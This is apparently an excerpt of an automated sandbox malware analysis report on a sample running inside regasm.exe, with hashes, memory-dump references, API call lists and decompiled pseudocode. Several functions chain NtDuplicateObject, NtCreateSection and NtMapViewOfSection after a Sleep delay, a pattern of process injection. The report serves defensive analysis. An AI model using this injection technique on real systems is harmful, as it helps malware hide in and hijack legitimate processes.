                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction ID: ff4493b43cc67e4d82ce7f7587b54c2ee82ff9f16eca668f6f9ea5c86dbb3bd5
                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction Fuzzy Hash: 3911833200014EBBCF125F84CD01CEE3F22BF58354B58842AFE5864175DB3AD972AB85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E0040EF5F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed int _t13;
                                                                                  				intOrPtr _t27;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  
                                                                                  				_t31 = __eflags;
                                                                                  				_t26 = __edi;
                                                                                  				_t25 = __edx;
                                                                                  				_t22 = __ebx;
                                                                                  				_push(0xc);
                                                                                  				_push(0x4197a8);
                                                                                  				E0040A19C(__ebx, __edi, __esi);
                                                                                  				_t29 = E00409042(__ebx, __edx, _t31);
                                                                                  				_t13 =  *0x42bfb4; // 0xfffffffe
                                                                                  				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                                                  					L6:
                                                                                  					E0040D6F9(_t22, _t26, 0xc);
                                                                                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                  					_t8 = _t29 + 0x6c; // 0x6c
                                                                                  					_t27 =  *0x42c098; // 0x42bfc0
                                                                                  					 *((intOrPtr*)(_t30 - 0x1c)) = E0040EF21(_t8, _t27);
                                                                                  					 *(_t30 - 4) = 0xfffffffe;
                                                                                  					E0040EFC9();
                                                                                  				} else {
                                                                                  					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                                                  					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						_t29 =  *((intOrPtr*)(E00409042(_t22, __edx, _t33) + 0x6c));
                                                                                  					}
                                                                                  				}
                                                                                  				if(_t29 == 0) {
                                                                                  					E0040A3BC(_t25, 0x20);
                                                                                  				}
                                                                                  				return E0040A1E1(_t29);
                                                                                  			}








                                                                                  0x0040ef5f
                                                                                  0x0040ef5f
                                                                                  0x0040ef5f
                                                                                  0x0040ef5f
                                                                                  0x0040ef5f
                                                                                  0x0040ef61
                                                                                  0x0040ef66
                                                                                  0x0040ef70
                                                                                  0x0040ef72
                                                                                  0x0040ef7a
                                                                                  0x0040ef9e
                                                                                  0x0040efa0
                                                                                  0x0040efa6
                                                                                  0x0040efaa
                                                                                  0x0040efad
                                                                                  0x0040efb8
                                                                                  0x0040efbb
                                                                                  0x0040efc2
                                                                                  0x0040ef7c
                                                                                  0x0040ef7c
                                                                                  0x0040ef80
                                                                                  0x00000000
                                                                                  0x0040ef82
                                                                                  0x0040ef87
                                                                                  0x0040ef87
                                                                                  0x0040ef80
                                                                                  0x0040ef8c
                                                                                  0x0040ef90
                                                                                  0x0040ef95
                                                                                  0x0040ef9d

                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0040EF6B
                                                                                    • Part of subcall function 00409042: __getptd_noexit.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409042: __amsg_exit.LIBCMT ref: 00409052
                                                                                  • __getptd.LIBCMT ref: 0040EF82
                                                                                  • __amsg_exit.LIBCMT ref: 0040EF90
                                                                                  • __lock.LIBCMT ref: 0040EFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: 0308af0317f2a261d42daf55f3a3dab8533374d4208ddf0d8861cb014701777f
                                                                                  • Instruction ID: 73f89469f2543316d168f9ad5ed8ce3c4a8a1c612c14721e6845e9614bf697fd
                                                                                  • Opcode Fuzzy Hash: 0308af0317f2a261d42daf55f3a3dab8533374d4208ddf0d8861cb014701777f
                                                                                  • Instruction Fuzzy Hash: CDF06D31A00701AED630EBAA840274D73A0AF00718F110A3FE594BB2D2CB7C9D11CA5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E00409913(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                  				intOrPtr _t17;
                                                                                  				intOrPtr* _t28;
                                                                                  				void* _t29;
                                                                                  				void* _t30;
                                                                                  
                                                                                  				_t30 = __eflags;
                                                                                  				_t28 = __esi;
                                                                                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                  				E00406768(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                  				 *((intOrPtr*)(E00409042(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                  				_t17 = E00409042(__ebx, __edx, _t30);
                                                                                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                  							_t17 = E00406741( *((intOrPtr*)(_t28 + 0x18)));
                                                                                  							_t38 = _t17;
                                                                                  							if(_t17 != 0) {
                                                                                  								_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                  								_push(_t28);
                                                                                  								return E004096AB(_t38);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t17;
                                                                                  			}







                                                                                  0x00409913
                                                                                  0x00409913
                                                                                  0x00409916
                                                                                  0x0040991c
                                                                                  0x0040992a
                                                                                  0x00409930
                                                                                  0x00409938
                                                                                  0x00409944
                                                                                  0x0040994c
                                                                                  0x00409954
                                                                                  0x00409968
                                                                                  0x00409973
                                                                                  0x00409979
                                                                                  0x0040997b
                                                                                  0x0040997d
                                                                                  0x00409980
                                                                                  0x00000000
                                                                                  0x00409987
                                                                                  0x0040997b
                                                                                  0x00409968
                                                                                  0x00409954
                                                                                  0x00409988

                                                                                  APIs
                                                                                    • Part of subcall function 00406768: __getptd.LIBCMT ref: 0040676E
                                                                                    • Part of subcall function 00406768: __getptd.LIBCMT ref: 0040677E
                                                                                  • __getptd.LIBCMT ref: 00409922
                                                                                    • Part of subcall function 00409042: __getptd_noexit.LIBCMT ref: 00409045
                                                                                    • Part of subcall function 00409042: __amsg_exit.LIBCMT ref: 00409052
                                                                                  • __getptd.LIBCMT ref: 00409930
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: csm
                                                                                  • API String ID: 803148776-1018135373
                                                                                  • Opcode ID: badc1385d409897c6e225ef118e40e3ae4261d902bc23bf9ec889be3dcc1ebc1
                                                                                  • Instruction ID: dabbab9f0b6154879bff0c0e655709f21d5a2e3df7f2d1b469a197568302ca5f
                                                                                  • Opcode Fuzzy Hash: badc1385d409897c6e225ef118e40e3ae4261d902bc23bf9ec889be3dcc1ebc1
                                                                                  • Instruction Fuzzy Hash: E60128B48003058ACF24AF66C4446AEB3B5AF60315FA4453FE891B63D2CB398D91CF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:53
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 1988 4017c4 1989 4017d6 1988->1989 1990 40188a Sleep 1989->1990 1990->1989 1961 401807 1962 4017ef 1961->1962 1964 40188a 1962->1964 1965 4018b5 1964->1965 1968 4030c3 1965->1968 1969 403051 1968->1969 1969->1968 1970 4030ba Sleep 1969->1970 1971 4030f3 1969->1971 1970->1969 1935 402c74 1938 402c6c 1935->1938 1936 402cfd 1938->1936 1939 40198e 1938->1939 1940 40199f 1939->1940 1941 4019c3 Sleep 1940->1941 1942 4019de 1941->1942 1944 4019ef 1942->1944 1945 4015d6 1942->1945 1944->1936 1946 4015e7 1945->1946 1947 401677 NtDuplicateObject 1946->1947 1951 401793 1946->1951 1948 401694 NtCreateSection 1947->1948 1947->1951 1949 401714 NtCreateSection 1948->1949 1950 4016ba NtMapViewOfSection 1948->1950 1949->1951 1952 401740 1949->1952 1950->1949 1953 4016dd NtMapViewOfSection 1950->1953 1951->1944 1952->1951 1954 40174a NtMapViewOfSection 1952->1954 1953->1949 1955 4016fb 1953->1955 1954->1951 1956 401771 NtMapViewOfSection 1954->1956 1955->1949 1956->1951 1991 4015d5 1992 4015e7 1991->1992 1993 401677 NtDuplicateObject 1992->1993 1997 401793 1992->1997 1994 401694 NtCreateSection 1993->1994 1993->1997 1995 401714 NtCreateSection 1994->1995 1996 4016ba NtMapViewOfSection 1994->1996 1995->1997 1998 401740 1995->1998 1996->1995 1999 4016dd NtMapViewOfSection 1996->1999 1998->1997 2000 40174a NtMapViewOfSection 1998->2000 1999->1995 2001 4016fb 1999->2001 2000->1997 2002 401771 NtMapViewOfSection 2000->2002 2001->1995 2002->1997 1984 402c3c 1987 402c50 1984->1987 1985 402cfd 1986 40198e 8 API calls 1986->1985 1987->1985 1987->1986 2048 40199e 2049 40199f 2048->2049 2050 4019c3 Sleep 2049->2050 2051 4019de 2050->2051 2052 4015d6 7 API calls 2051->2052 2053 4019ef 2051->2053 2052->2053

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 37%
                                                                                  			E004015D6(void* __edx, void* __fp0, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                                  				void* _v3;
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v44;
                                                                                  				void* _v52;
                                                                                  				void* _v56;
                                                                                  				void* _v60;
                                                                                  				void* _v64;
                                                                                  				void* _v68;
                                                                                  				void* _v72;
                                                                                  				void* _v76;
                                                                                  				void* _v84;
                                                                                  				void* _v88;
                                                                                  				void* _v92;
                                                                                  				void* _v96;
                                                                                  				void* _v100;
                                                                                  				void* _t84;
                                                                                  
                                                                                  				_t84 = 0x1613;
                                                                                  				_push(0x374);
                                                                                  			}






















                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 6ff70707f6df06a6ccecdcb67c6e9e884a685d97cc4de85dc700c03c7ee269e8
                                                                                  • Instruction ID: 0d5890da022090a977656a76e4e0e389f4a94210290042ef828f6671061bd0b5
                                                                                  • Opcode Fuzzy Hash: 6ff70707f6df06a6ccecdcb67c6e9e884a685d97cc4de85dc700c03c7ee269e8
                                                                                  • Instruction Fuzzy Hash: 2F513CB5500205BFEB209F91CC49FAF7BB8EF85B10F10012AF912BA2E5D7759941CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E004015D5(void* __edx) {
                                                                                  				void* _t4;
                                                                                  
                                                                                  				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
                                                                                  			}




                                                                                  0x004015d5

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 0062549318bbf479dc1fe13b7535a0ebf43337b757e2c1b9ef8c31d90750064d
                                                                                  • Instruction ID: 9ff45383df48fb0826de9a286d7e4e1324ef41f44cc430fddfaef00f0ae6a2d7
                                                                                  • Opcode Fuzzy Hash: 0062549318bbf479dc1fe13b7535a0ebf43337b757e2c1b9ef8c31d90750064d
                                                                                  • Instruction Fuzzy Hash: 2E51F8B4900249BFEB208F91CC48FEFBBB8EF85B10F100169F911BA2A5D7759945CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 82 4015e2-401621 call 4012bf 89 401623 82->89 90 401626-40162b 82->90 89->90 92 401631-401642 90->92 93 40194e-401956 90->93 96 401648-401671 92->96 97 40194c-40196c 92->97 93->90 96->97 105 401677-40168e NtDuplicateObject 96->105 101 401962-401968 97->101 102 40196f-40198b call 4012bf 97->102 101->102 105->97 107 401694-4016b8 NtCreateSection 105->107 110 401714-40173a NtCreateSection 107->110 111 4016ba-4016db NtMapViewOfSection 107->111 110->97 113 401740-401744 110->113 111->110 114 4016dd-4016f9 NtMapViewOfSection 111->114 113->97 115 40174a-40176b NtMapViewOfSection 113->115 114->110 116 4016fb-401711 114->116 115->97 117 401771-40178d NtMapViewOfSection 115->117 116->110 117->97 119 401793 call 401798 117->119
                                                                                  C-Code - Quality: 68%
                                                                                  			E004015E2(void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t175;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				_t184 = __esi;
                                                                                  				_t175 = __edi;
                                                                                  				_t84 = 0x1613;
                                                                                  				_push(0x374);
                                                                                  			}






                                                                                  0x004015e2
                                                                                  0x004015e2
                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 444aa009c48ada74fa89dbfd7bbcf1eb4eb2f253530a4383063b6273bfe597cc
                                                                                  • Instruction ID: 786437f5aaac71635f62937e58460e603824b182e89f0a7aff4bd48dbc40d357
                                                                                  • Opcode Fuzzy Hash: 444aa009c48ada74fa89dbfd7bbcf1eb4eb2f253530a4383063b6273bfe597cc
                                                                                  • Instruction Fuzzy Hash: 815127B4900249BFEB208F91CC48FEFBBB8EF85B10F104169F911BA2A5D7749945CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 121 4015ef-401621 call 4012bf 128 401623 121->128 129 401626-40162b 121->129 128->129 131 401631-401642 129->131 132 40194e-401956 129->132 135 401648-401671 131->135 136 40194c-40196c 131->136 132->129 135->136 144 401677-40168e NtDuplicateObject 135->144 140 401962-401968 136->140 141 40196f-40198b call 4012bf 136->141 140->141 144->136 146 401694-4016b8 NtCreateSection 144->146 149 401714-40173a NtCreateSection 146->149 150 4016ba-4016db NtMapViewOfSection 146->150 149->136 152 401740-401744 149->152 150->149 153 4016dd-4016f9 NtMapViewOfSection 150->153 152->136 154 40174a-40176b NtMapViewOfSection 152->154 153->149 155 4016fb-401711 153->155 154->136 156 401771-40178d NtMapViewOfSection 154->156 155->149 156->136 158 401793 call 401798 156->158
                                                                                  C-Code - Quality: 50%
                                                                                  			E004015EF(void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t174;
                                                                                  				void* _t183;
                                                                                  
                                                                                  				_t183 = __esi;
                                                                                  				_t174 = __edi;
                                                                                  				asm("enter 0xeb5d, 0xf4");
                                                                                  				_t84 = 0x1613;
                                                                                  				_push(0x374);
                                                                                  			}






                                                                                  0x004015ef
                                                                                  0x004015ef
                                                                                  0x004015ef
                                                                                  0x004015ec
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401735
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401766
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401788
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 1546783058-0
                                                                                  • Opcode ID: 593592a389a18e9ff3cf9be2642554562a363e94e81370f5fce736fd81cd0569
                                                                                  • Instruction ID: 8056fab5990907f184dcc33f0ebd9c45d80b5d949791b609f029eb95c4498140
                                                                                  • Opcode Fuzzy Hash: 593592a389a18e9ff3cf9be2642554562a363e94e81370f5fce736fd81cd0569
                                                                                  • Instruction Fuzzy Hash: AC5117B4900249BFEB208F91CC48FEFBBB8EF85B10F100169F911BA2A5D7759944CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 160 4015f6-4015fd 161 401602-401621 call 4012bf 160->161 162 4015ff-401601 160->162 166 401623 161->166 167 401626-40162b 161->167 162->161 166->167 169 401631-401642 167->169 170 40194e-401956 167->170 173 401648-401671 169->173 174 40194c-40196c 169->174 170->167 173->174 182 401677-40168e NtDuplicateObject 173->182 178 401962-401968 174->178 179 40196f-40198b call 4012bf 174->179 178->179 182->174 184 401694-4016b8 NtCreateSection 182->184 187 401714-40173a NtCreateSection 184->187 188 4016ba-4016db NtMapViewOfSection 184->188 187->174 190 401740-401744 187->190 188->187 191 4016dd-4016f9 NtMapViewOfSection 188->191 190->174 192 40174a-40176b NtMapViewOfSection 190->192 191->187 193 4016fb-401711 191->193 192->174 194 401771-40178d NtMapViewOfSection 192->194 193->187 194->174 196 401793 call 401798 194->196
                                                                                  C-Code - Quality: 58%
                                                                                  			E004015F6(void* __eax, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t84;
                                                                                  				void* _t174;
                                                                                  				void* _t183;
                                                                                  				void* _t198;
                                                                                  
                                                                                  				_t183 = __esi;
                                                                                  				_t174 = __edi;
                                                                                  				_t84 = __eax;
                                                                                  				_t198 = 0xd31bcf32;
                                                                                  				asm("int 0x68");
                                                                                  				_push(0x374);
                                                                                  			}







                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015f6
                                                                                  0x004015fb
                                                                                  0x004015fc

                                                                                  APIs
                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$View$CreateDuplicateObject
                                                                                  • String ID:
                                                                                  • API String ID: 3617974760-0
                                                                                  • Opcode ID: c22fe54737c620c68f23b2895a4951b95a0da419d199e203eb4d30b80168da78
                                                                                  • Instruction ID: 8a50d415183a273aa1a09ec5cfc0b66a711e3eaeac860d1ed6f1fb4bdc85a088
                                                                                  • Opcode Fuzzy Hash: c22fe54737c620c68f23b2895a4951b95a0da419d199e203eb4d30b80168da78
                                                                                  • Instruction Fuzzy Hash: 185119B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911AA2A5D7749944CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 233 40198e-4019e0 call 4012bf Sleep call 401505 244 4019e2-4019ea call 4015d6 233->244 245 4019ef-401a16 233->245 244->245 252 401a19-401a22 call 4012bf 245->252 253 401a0d-401a12 245->253 253->252
                                                                                  C-Code - Quality: 33%
                                                                                  			E0040198E(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				char _v8;
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t16;
                                                                                  				void* _t18;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t19 = __edi;
                                                                                  				_t8 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t16 = _a4;
                                                                                  				Sleep(0x1388);
                                                                                  				_push( &_v8);
                                                                                  				_push(_a12);
                                                                                  				_push(_a8);
                                                                                  				_push(_t16); // executed
                                                                                  				_t11 = E00401505(_t16, _t18, _t19, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t18, __fp0, _t16, _t11, _v8, _a16); // executed
                                                                                  				}
                                                                                  				 *_t16(0xffffffff, 0);
                                                                                  			}








                                                                                  0x0040198e
                                                                                  0x0040198e
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: f7b2af990834639229ccfabb40bfb65ed4cd40ece049db58581dba00d3209e05
